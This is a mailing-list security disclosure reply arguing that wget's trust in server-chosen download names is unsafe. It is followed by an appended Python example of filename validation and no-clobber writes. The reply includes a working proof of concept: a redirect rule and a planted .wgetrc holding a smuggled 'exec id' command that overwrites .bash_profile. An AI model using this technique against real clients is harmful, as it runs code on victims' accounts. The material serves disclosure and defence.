List: oss-security
Subject: Re: [oss-security] [oCERT-2010-001] multiple http client unexpected download filename vulnerability
From: Solar Designer <solar () openwall ! com>
Date: 2010-05-18 23:42:29
Message-ID: 20100518234229.GA13745 () openwall ! com
On Tue, May 18, 2010 at 09:50:27AM +0200, Ludwig Nussel wrote:
> wget doesn't overwrite existing files by default anyways. Instead it appends a
> suffix .1, .2 etc to the newly downloaded file.
Well, a server can sometimes override that default - please see below.
> wget also prints the file name it used.
This is of limited help - and for interactive uses only. I am mostly
concerned about uses from cron jobs and the like.
> So IMO it's perfectly fine and useful for wget to take the server
> provided file name by default.
I disagree. Uses from scripts and cron jobs are too common, and they
often don't care to specify an output filename explicitly.
Let's suppose there's a cron job like this:

1 * * * * wget http://www.openwall.com/pvt/wget/log &> /dev/null

If the server is malicious or compromised, it can have:

RedirectMatch log $1/pvt/wget/.wgetrc

in .htaccess, and

reject=; exec id
output-document=.bash_profile

in .wgetrc. When the cron job runs for the first time after the above
changes are made on the server, it does:

02:01:02 (2.64 MB/s) - `.wgetrc' saved [47/47]

At this point, .wgetrc is on the client system. The second time the
cron job runs, it does:

03:01:02 (2.99 MB/s) - `.bash_profile' saved [47/47]

This has happily overwritten my .bash_profile file.
(I replaced "/dev/null" in the cron job with another filename for
obtaining these wget output lines.)
When I log in to the affected account, I get the output of "id".
Of course, the shell command could as well be nastier than that.
Although I used a somewhat tricky approach in the above exploit,
eventually making wget overwrite a file, it is also possible to mount
attacks that do not rely on overwriting any files. Many programs
support optional startup/config files of fixed/known/guessable names
that a malicious or compromised server could provide. In fact, I've
just demonstrated this attack against wget itself, but it could also
work against another program.
Is this more convincing now?
Alexander
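As an added example, not part of this thread and not wget's own code: the validation a download client (or a wrapper script around one) should apply before trusting a server-chosen name, whether it comes from a redirect target or a Content-Disposition header, plus an exclusive-create write so that no fetched .wgetrc can turn the no-overwrite behaviour off. Function names and the sample inputs are assumed for illustration.

```python
import os
import tempfile
from urllib.parse import unquote, urlsplit


def safe_local_name(suggested: str):
    """Reduce a server-suggested name to a single plain filename, or return
    None if it must not be used.  Rejects empty names, '.', '..', control
    characters, and dotfiles (so .wgetrc, .bash_profile, .netrc and similar
    startup/config files can never be planted by a server)."""
    name = unquote(suggested)                     # undo %2e-style encoding first
    if any(c in name for c in "\x00\r\n"):
        return None
    # Keep only the last path component; treat backslash as a separator too.
    base = name.replace("\\", "/").rstrip("/").split("/")[-1]
    if base in ("", ".", "..") or base.startswith("."):
        return None
    return base


def name_from_redirect(url: str):
    """Name to use after following a redirect such as .../pvt/wget/.wgetrc."""
    return safe_local_name(urlsplit(url).path)


def save_exclusive(directory: str, name: str, data: bytes) -> bool:
    """Write data under an already validated name, never overwriting an
    existing file.  O_EXCL makes the kernel enforce no-clobber, independent
    of any client configuration file."""
    path = os.path.join(directory, name)
    try:
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    except FileExistsError:
        return False
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return True


def demo_no_clobber():
    """Constructed check: the second write to the same name is refused."""
    with tempfile.TemporaryDirectory() as d:
        return (save_exclusive(d, "log", b"first"),
                save_exclusive(d, "log", b"second"))
```

A cron job that cannot use such a client should at least pass an explicit output name (wget -O), so the server-chosen name is never consulted.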